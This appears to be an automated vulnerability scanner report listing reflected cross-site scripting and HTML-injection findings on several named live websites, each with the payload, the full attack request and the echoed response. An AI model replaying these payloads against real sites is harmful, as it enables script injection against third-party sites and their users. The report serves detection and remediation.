<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-
...[SNIP]...
<![CDATA[
s.pageName='/5a6af';alert(1)//643b2b45b88/index.jsp';
s.server='532';
s.channel='';
s.pageType='errorPage';
s.pageURL='';
s.referrer='';
s.campaign='';
s.prop1='';
s.prop2='20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landing
...[SNIP]...

2.201. http://www.constantcontact.com/search/index.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.constantcontact.com
Path:   /search/index.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73d98'%3balert(1)//22f7c896d61 was submitted in the REST URL parameter 1. This input was echoed as 73d98';alert(1)//22f7c896d61 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search73d98'%3balert(1)//22f7c896d61/index.jsp HTTP/1.1
Host: www.constantcontact.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";

Response

HTTP/1.1 404 Not Found
Date: Thu, 25 Nov 2010 04:55:04 GMT
Server: Apache
X-Powered-By:
Set-Cookie: JSESSIONID=8CAF8FCD5338B302680FF076B22052CB.worker_landingPages; Path=/
Set-Cookie: impcc=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ctctblog=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:55:04 GMT; Path=/
Set-Cookie: cclp_cc="cc_01_ts=21456138|cc_02_ts=21456138|cc_02=impcc::IMP_143029301421510|cc_01=impcc::IMP_143029301421510|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:55:04 GMT; Path=/
Set-Cookie: cclp_partner="prt_04=partner.name::ROVING|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|prt_01_ts=21510869|prt_02_ts=21510889|prt_03_ts=21510937|prt_04_ts=21511015|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:55:04 GMT; Path=/
Set-Cookie: cclp_referral="partner=ROVING|impcc=IMP_143029301421510|cc=IMP_143029301421510|sitereferrer=http://www.constantcontact.com/error_404.jsp|partner.name=ROVING|pn=ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:55:04 GMT; Path=/
Pragma: no-cache, no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, private, no-cache, no-store, max-age=0, must-revalidate, no-cache="Set-Cookie"
Cache-Control: no-store
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 21124

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-
...[SNIP]...
<![CDATA[
s.pageName='/search73d98';alert(1)//22f7c896d61/index.jsp';
s.server='534';
s.channel='';
s.pageType='errorPage';
s.pageURL='';
s.referrer='';
s.campaign='IMP_143029301421510';
s.prop1='';
s.prop2='20101124_21:29:13.262_F318E20503E8B28222E664EBA500
...[SNIP]...

2.202. http://www.constantcontact.com/search/index.jsp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.constantcontact.com
Path:   /search/index.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e959'%3balert(1)//6b36809a503 was submitted in the REST URL parameter 2. This input was echoed as 3e959';alert(1)//6b36809a503 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search/3e959'%3balert(1)//6b36809a503 HTTP/1.1
Host: www.constantcontact.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 25 Nov 2010 04:55:09 GMT
Server: Apache
X-Powered-By:
Set-Cookie: JSESSIONID=479318D603B980D4AB8AEA749C30A60A.worker_landingPages; Path=/
Set-Cookie: impcc=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ctctblog=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:55:09 GMT; Path=/
Set-Cookie: cclp_cc="cc_01_ts=21456138|cc_02_ts=21456138|cc_02=impcc::IMP_143029301421510|cc_01=impcc::IMP_143029301421510|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:55:09 GMT; Path=/
Set-Cookie: cclp_partner="prt_04=partner.name::ROVING|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|prt_01_ts=21510869|prt_02_ts=21510889|prt_03_ts=21510937|prt_04_ts=21511015|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:55:09 GMT; Path=/
Set-Cookie: cclp_referral="partner=ROVING|impcc=IMP_143029301421510|cc=IMP_143029301421510|sitereferrer=http://www.constantcontact.com/error_404.jsp|partner.name=ROVING|pn=ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:55:09 GMT; Path=/
Pragma: no-cache, no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, private, no-cache, no-store, max-age=0, must-revalidate, no-cache="Set-Cookie"
Cache-Control: no-store
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 21127

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-
...[SNIP]...
<![CDATA[
s.pageName='/search/3e959';alert(1)//6b36809a503/index.jsp';
s.server='534';
s.channel='';
s.pageType='errorPage';
s.pageURL='';
s.referrer='';
s.campaign='IMP_143029301421510';
s.prop1='';
s.prop2='20101124_21:29:13.262_F318E20503E8B28222E664EBA500
...[SNIP]...

2.203. http://www.constantcontact.com/social-media-for-small-business/index.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.constantcontact.com
Path:   /social-media-for-small-business/index.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9a7ce'%3balert(1)//5d392b94a86 was submitted in the REST URL parameter 1. This input was echoed as 9a7ce';alert(1)//5d392b94a86 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /social-media-for-small-business9a7ce'%3balert(1)//5d392b94a86/index.jsp HTTP/1.1
Host: www.constantcontact.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";

Response

HTTP/1.1 404 Not Found
Date: Thu, 25 Nov 2010 04:54:30 GMT
Server: Apache
X-Powered-By:
Set-Cookie: JSESSIONID=07661B1F81B532E5E3A3E0EFF0E9E2BB.worker_landingPages; Path=/
Set-Cookie: impcc=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ctctblog=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:30 GMT; Path=/
Set-Cookie: cclp_cc="cc_01_ts=21456138|cc_02_ts=21456138|cc_02=impcc::IMP_143029301421510|cc_01=impcc::IMP_143029301421510|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:30 GMT; Path=/
Set-Cookie: cclp_partner="prt_04=partner.name::ROVING|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|prt_01_ts=21510869|prt_02_ts=21510889|prt_03_ts=21510937|prt_04_ts=21511014|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:30 GMT; Path=/
Set-Cookie: cclp_referral="partner=ROVING|impcc=IMP_143029301421510|cc=IMP_143029301421510|sitereferrer=http://www.constantcontact.com/error_404.jsp|partner.name=ROVING|pn=ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:30 GMT; Path=/
Pragma: no-cache, no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, private, no-cache, no-store, max-age=0, must-revalidate, no-cache="Set-Cookie"
Cache-Control: no-store
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 21199

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-
...[SNIP]...
<![CDATA[
s.pageName='/social-media-for-small-business9a7ce';alert(1)//5d392b94a86/index.jsp';
s.server='534';
s.channel='';
s.pageType='errorPage';
s.pageURL='';
s.referrer='';
s.campaign='IMP_143029301421510';
s.prop1='';
s.prop2='20101124_21:29:13.262_F318E20503E8B28222E664EBA500
...[SNIP]...

2.204. http://www.constantcontact.com/social-media-for-small-business/index.jsp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.constantcontact.com
Path:   /social-media-for-small-business/index.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54e67'%3balert(1)//a31647066fb was submitted in the REST URL parameter 2. This input was echoed as 54e67';alert(1)//a31647066fb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /social-media-for-small-business/54e67'%3balert(1)//a31647066fb HTTP/1.1
Host: www.constantcontact.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 25 Nov 2010 04:54:37 GMT
Server: Apache
X-Powered-By:
Set-Cookie: JSESSIONID=68F49DBDDF1CE5E4D7835A57D9A33ABF.worker_landingPages; Path=/
Set-Cookie: impcc=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ctctblog=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:37 GMT; Path=/
Set-Cookie: cclp_cc="cc_01_ts=21456138|cc_02_ts=21456138|cc_02=impcc::IMP_143029301421510|cc_01=impcc::IMP_143029301421510|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:37 GMT; Path=/
Set-Cookie: cclp_partner="prt_04=partner.name::ROVING|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|prt_01_ts=21510869|prt_02_ts=21510889|prt_03_ts=21510937|prt_04_ts=21511014|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:37 GMT; Path=/
Set-Cookie: cclp_referral="partner=ROVING|impcc=IMP_143029301421510|cc=IMP_143029301421510|sitereferrer=http://www.constantcontact.com/error_404.jsp|partner.name=ROVING|pn=ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:37 GMT; Path=/
Pragma: no-cache, no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, private, no-cache, no-store, max-age=0, must-revalidate, no-cache="Set-Cookie"
Cache-Control: no-store
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 21202

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-
...[SNIP]...
<![CDATA[
s.pageName='/social-media-for-small-business/54e67';alert(1)//a31647066fb/index.jsp';
s.server='534';
s.channel='';
s.pageType='errorPage';
s.pageURL='';
s.referrer='';
s.campaign='IMP_143029301421510';
s.prop1='';
s.prop2='20101124_21:29:13.262_F318E20503E8B28222E664EBA500
...[SNIP]...

2.205. http://www.cornwallkiosk.com/directory.php [categoryId parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cornwallkiosk.com
Path:   /directory.php

Issue detail

The value of the categoryId request parameter is copied into the HTML document as plain text between tags. The payload 89f1c<a>d897a860f8b was submitted in the categoryId parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /directory.php?name=Consulting&categoryId=22889f1c<a>d897a860f8b HTTP/1.1
Host: www.cornwallkiosk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 04:55:51 GMT
Server: Apache/1.3.37 (Unix) PHP/5.2.0 mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.28 OpenSSL/0.9.7a
X-Powered-By: PHP/5.2.0
Connection: close
Content-Type: text/html
Content-Length: 1342

mysql error: [1054: Unknown column '22889f1c' in 'where clause'] in EXECUTE("SELECT parent_category_id FROM category WHERE category_id = 22889f1c<a>d897a860f8b ORDER BY name ASC")
<pre align=left> &nb
...[SNIP]...

2.206. http://www.destech.com/registerme.asp [category parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.destech.com
Path:   /registerme.asp

Issue detail

The value of the category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90d87"><script>alert(1)</script>e4b51f359b3 was submitted in the category parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /registerme.asp?category=Crystal+Reports90d87"><script>alert(1)</script>e4b51f359b3 HTTP/1.1
Host: www.destech.com
Proxy-Connection: keep-alive
Referer: http://www.destech.com/registerme.asp
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDAQBRSATD=BADNOILCCKLNDAIHOGIBEOAG; __utma=149768483.809640380.1290651366.1290651366.1290651366.1; __utmc=149768483; __utmz=149768483.1290651366.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=149768483

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 04:31:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 24335
Content-Type: text/html
Cache-control: private

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<meta name="keywords" content="oracle consulting, oracle consulting toronto, oracle consulting canada, oracl
...[SNIP]...
<input name="catname1" id="catname1" value="Crystal Reports90d87"><script>alert(1)</script>e4b51f359b3" type=hidden size=1px>
...[SNIP]...

2.207. http://www.edmontonkiosk.ca/directory.php [categoryId parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.edmontonkiosk.ca
Path:   /directory.php

Issue detail

The value of the categoryId request parameter is copied into the HTML document as plain text between tags. The payload 88222<a>61a1b7d1c97 was submitted in the categoryId parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /directory.php?name=Consulting&categoryId=22888222<a>61a1b7d1c97 HTTP/1.1
Host: www.edmontonkiosk.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 05:00:06 GMT
Server: Apache/1.3.37 (Unix) PHP/5.2.0 mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.28 OpenSSL/0.9.7a
X-Powered-By: PHP/5.2.0
Connection: close
Content-Type: text/html
Content-Length: 1335

mysql error: [1054: Unknown column 'a' in 'where clause'] in EXECUTE("SELECT parent_category_id FROM category WHERE category_id = 22888222<a>61a1b7d1c97 ORDER BY name ASC")
<pre align=left> &nbsp; &n
...[SNIP]...

2.208. http://www.eironclad.com/contact-us/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.eironclad.com
Path:   /contact-us/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dcd66"><script>alert(1)</script>b85dc925199 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact-us/index.php/dcd66"><script>alert(1)</script>b85dc925199 HTTP/1.1
Host: www.eironclad.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=66737466.1290654051.1.1.utmgclid=CKuAnoT9uqUCFQ2e7Qoda2zJYg|utmccn=(not+set)|utmcmd=(not+set); __utma=66737466.323249853.1290654051.1290654051.1290654051.1; __utmc=66737466; __utmb=66737466;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 03:01:54 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Contact Us - eIRONcl
...[SNIP]...
<form method="POST" action="/contact-us/index.php/dcd66"><script>alert(1)</script>b85dc925199" name="contactform">
...[SNIP]...

2.209. http://www.fastcompany.com/1699391/what-helps-small-business-grow-its-still-email [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fastcompany.com
Path:   /1699391/what-helps-small-business-grow-its-still-email

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed74e"><script>alert(1)</script>de54ef6f2f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /1699391/what-helps-small-business-grow-its-still-email?ed74e"><script>alert(1)</script>de54ef6f2f1=1 HTTP/1.1
Host: www.fastcompany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 05:27:05 GMT
Server: VoxCAST
X-Powered-By: PHP/5.2.4
X-Drupal-Cache: MISS
Expires: Thu, 25 Nov 2010 05:48:00 GMT
Last-Modified: Thu, 25 Nov 2010 05:28:00 GMT
Cache-Control: max-age=0, s-maxage=1200, store, must-revalidate, post-check=0, pre-check=0
ETag: "1290662880-0"
Vary: Cookie,Accept-Encoding
X-Served-By: daa-www011
Content-Type: text/html; charset=utf-8
X-Cache: MISS from VoxCAST
Set-Cookie: SESS016578d1318953fcdc44103ac4a9b3f3=e7pb7oplofq6rtt1ae45d02990; expires=Sat, 18 Dec 2010 09:01:21 GMT; path=/; domain=.fastcompany.com
Connection: close
Content-Length: 35744

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
...[SNIP]...
<link rel="canonical" href="/1699391/what-helps-small-business-grow-its-still-email?ed74e"><script>alert(1)</script>de54ef6f2f1=1" />
...[SNIP]...

2.210. http://www.findmylocaljob.net/profile.php [f parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.findmylocaljob.net
Path:   /profile.php

Issue detail

The value of the f request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85c5a</script><script>alert(1)</script>6077bb4736d was submitted in the f parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /profile.php?f=g85c5a</script><script>alert(1)</script>6077bb4736d&kw=Adecco%20jobs HTTP/1.1
Host: www.findmylocaljob.net
Accept: */*
Accept-Language: en
